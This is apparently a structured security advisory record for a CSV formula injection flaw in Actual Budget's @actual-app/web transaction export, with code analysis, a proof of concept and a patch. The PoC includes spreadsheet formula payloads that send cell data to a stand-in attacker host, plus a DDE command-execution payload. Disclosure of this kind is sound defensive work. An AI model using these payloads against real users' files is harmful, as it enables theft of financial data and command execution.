{"id":"CVE-2026-50179","title":"@actual-app/web has CSV Formula Injection in Transaction Export via Imported Payee/Notes Fields","summary":"@actual-app/web has CSV Formula Injection in Transaction Export via Imported Payee/Notes Fields","severity":"medium","cvss":4.2,"cwe":["CWE-1236"],"vendor":"actual-app","product":"@actual-app/web","ecosystem":"npm","affected":["@actual-app/web < 26.6.0"],"patched":["@actual-app/web 26.6.0"],"published":"2026-06-22","updated":"2026-06-22","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-xqjm-27pc-rvwm","references":[{"url":"https://github.com/actualbudget/actual/security/advisories/GHSA-xqjm-27pc-rvwm"},{"url":"https://github.com/advisories/GHSA-xqjm-27pc-rvwm"}],"tags":["ghsa","npm"],"ingestedAt":"2026-06-29T13:24:35.484Z","epss":0.00286,"epssPercentile":0.21382,"slug":"CVE-2026-50179","body":"## Overview\n\n## Summary\n\n`exportToCSV` and `exportQueryToCSV` in `packages/loot-core/src/server/transactions/export/export-to-csv.ts` pass user-controlled `Payee`, `Notes`, `Account`, and `Category` strings to `csv-stringify` with no `cast` callback and no formula-prefix neutralization. Strings that begin with `=`, `+`, `-`, `@`, tab, or carriage return survive verbatim into the exported CSV. When the victim (or anyone they share the export with) opens the file in Excel, LibreOffice Calc, or Google Sheets, the strings are interpreted as formulas. `=HYPERLINK(\"http://attacker/?leak=\"&B2,\"Bank refund\")` is the most reliable variant: it renders as a clickable link with benign text and exfiltrates adjacent cells (transaction amount, account name, payee, balance) on click, with no security prompt in modern Excel/Sheets. `=WEBSERVICE`/`=IMPORTXML` provide auto-firing exfil in some configurations; legacy DDE may achieve RCE on older Excel.\n\n## Details\n\nSink — `packages/loot-core/src/server/transactions/export/export-to-csv.ts:56`:\n\n```ts\nreturn csvStringify(transactionsForExport, { header: true });\n```\n\nand the same call again at `export-to-csv.ts:131` for `exportQueryToCSV`. `csv-stringify` v6 does not neutralize formula-trigger characters by default; only quote/comma/CRLF escaping is applied. There is no shared wrapper — `grep` for `csvStringify` finds exactly one source file across the monorepo.\n\nSource of attacker-controlled `Payee`/`Notes`:\n\n- `packages/loot-core/src/server/transactions/import/parse-file.ts:77` dispatches uploaded files to `parseCSV` (`:109`), `parseOFX` (`:200`), `parseQIF` (`:158`), `parseCAMT` (`:250`). None of them strip or escape formula prefixes from `payee_name`/`imported_payee`/`notes`.\n- For OFX, `mapOfxTransaction` in `packages/loot-core/src/server/transactions/import/ofx2json.ts` only runs `html2Plain` (HTML entity decoding) on the NAME field — `=`, `+`, `-`, `@`, `\\t` are untouched.\n- `sync.normalizeTransactions` (`packages/loot-core/src/server/transactions/sync.ts`) applies `title()` casing, which only mutates letters via `String.toLowerCase`; non-letter prefix characters are preserved, and Excel formulas are case-insensitive (`=hyperlink(...)` parses identically to `=HYPERLINK(...)`).\n- The payee can also be entered directly through the UI or set via the `@actual-app/api`'s payee/transaction CRUD endpoints — anyone with write access to a shared budget can plant the payload.\n\nVerification that `csv-stringify` does not neutralize formulas:\n\n```\n$ node -e \"const{stringify}=require('csv-stringify/sync');console.log(stringify([{Payee:'=HYPERLINK(\\\"http://x/?\\\"&B2,\\\"refund\\\")'}],{header:true}))\"\nPayee\n\"=HYPERLINK(\"\"http://x/?\"\"&B2,\"\"refund\"\")\"\n```\n\nThe double-quote escaping is intact, but the leading `=` is not prefixed with `'` or otherwise neutralized — Excel, LibreOffice Calc, and Google Sheets will all evaluate this as a formula on open.\n\n## PoC\n\n1. Attacker delivers a malicious file the victim is willing to import (fake bank OFX statement, shared budget file, expense-tracking CSV from a collaborator). Example malicious CSV the victim drops into \"Import file\":\n\n```\nDate,Payee,Amount\n2026-01-01,\"=HYPERLINK(\"\"http://attacker.evil/leak?d=\"\"&B2&C2,\"\"Bank refund details\"\")\",100.00\n2026-01-02,\"@SUM(1+1)*cmd|'/c calc'!A0\",50.00\n2026-01-03,\"+1+1\",-25.00\n2026-01-04,\"=WEBSERVICE(\"\"http://attacker.evil/?d=\"\"&B2)\",10.00\n```\n\n2. Victim imports through Account → Import file. `parseFile` (`parse-file.ts:77`) → `parseCSV`/`parseOFX`/`parseQIF`/`parseCAMT` returns rows with the formula strings preserved as `payee_name`. `sync.normalizeTransactions` does not strip the prefix characters.\n3. Payees are persisted into the `payees` table verbatim.\n4. Some time later the victim runs Account → menu → Export. `transactions-export-query` invokes `exportQueryToCSV` (`export-to-csv.ts:131`).\n5. The exported file looks like (verified output shape from `csvStringify`):\n\n```\nAccount,Date,Payee,Notes,Category_Group,Category,Amount,Split_Amount,Cleared\nChecking,2026-01-01,\"=HYPERLINK(\"\"http://attacker.evil/leak?d=\"\"&B2&C2,\"\"Bank refund details\"\")\",,,,100.00,0,Not cleared\nChecking,2026-01-02,@SUM(1+1)*cmd|'/c calc'!A0,,,,50.00,0,Not cleared\nChecking,2026-01-03,+1+1,,,,-25.00,0,Not cleared\nChecking,2026-01-04,\"=WEBSERVICE(\"\"http://attacker.evil/?d=\"\"&B2)\",,,,10.00,0,Not cleared\n```\n\n6. Victim or downstream recipient (accountant, spouse, tax preparer) opens the CSV in Excel/LibreOffice/Sheets. `=HYPERLINK(...)` renders as a clickable link that exfiltrates adjacent cell values to attacker on click; `=WEBSERVICE`/`=IMPORTXML` (Sheets/LibreOffice) fire automatically; legacy `=cmd|...` DDE may execute on unpatched Excel.\n\n## Impact\n\n- **Confidentiality**: Adjacent transaction data (amounts, account names, balances, payees, categories) can be exfiltrated to attacker-controlled URLs through `=HYPERLINK` clicks or auto-firing `=WEBSERVICE`/`=IMPORTXML`.\n- **Integrity**: Spreadsheet recipients (accountants, tax preparers) see attacker-chosen display values where they expected raw payee names, enabling fraud (e.g., forged \"Refund\" line items linking to phishing).\n- **Reach**: Exports from Actual Budget are commonly shared with third parties (accountants, tax software, household members). One malicious imported statement contaminates every future export of that budget.\n- **Note on AC:H**: requires victim-driven import → export → spreadsheet open. Modern Excel disables DDE by default, narrowing the RCE pathway, but `=HYPERLINK` exfil is universal and silent.\n\n## Recommended Fix\n\nPass a `cast.string` callback to `csv-stringify` that prefixes any formula-trigger string with a single quote, the OWASP-recommended neutralization. Apply at both call sites in `packages/loot-core/src/server/transactions/export/export-to-csv.ts`:\n\n```ts\nimport { stringify as csvStringify } from 'csv-stringify/sync';\n\nconst FORMULA_PREFIX = /^[=+\\-@\\t\\r]/;\n\nfunction neutralizeFormula(value: string): string {\n  return FORMULA_PREFIX.test(value) ? `'${value}` : value;\n}\n\nconst csvOptions = {\n  header: true,\n  cast: {\n    string: (value: string) => neutralizeFormula(value),\n  },\n} as const;\n\n// export-to-csv.ts:56\nreturn csvStringify(transactionsForExport, csvOptions);\n\n// export-to-csv.ts:131\nreturn csvStringify(transactionsForExport, csvOptions);\n```\n\nAlternative defenses to consider in addition:\n- Strip/neutralize formula prefixes on import in `parse-file.ts` for `payee_name`/`notes` so the database never contains formula-shaped strings (defense in depth — protects any future export consumers).\n- Add a regression unit test that asserts every CSV cell starting with `=`, `+`, `-`, `@`, `\\t`, or `\\r` is prefixed with `'`.\n\n## Affected packages\n\n- `@actual-app/web < 26.6.0`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `@actual-app/web 26.6.0`","depth":"sunlit","depthScore":23,"depthScoreParts":{"impact":23.1,"likelihood":0.1,"exploitation":0,"ransomware":0},"changes":[]}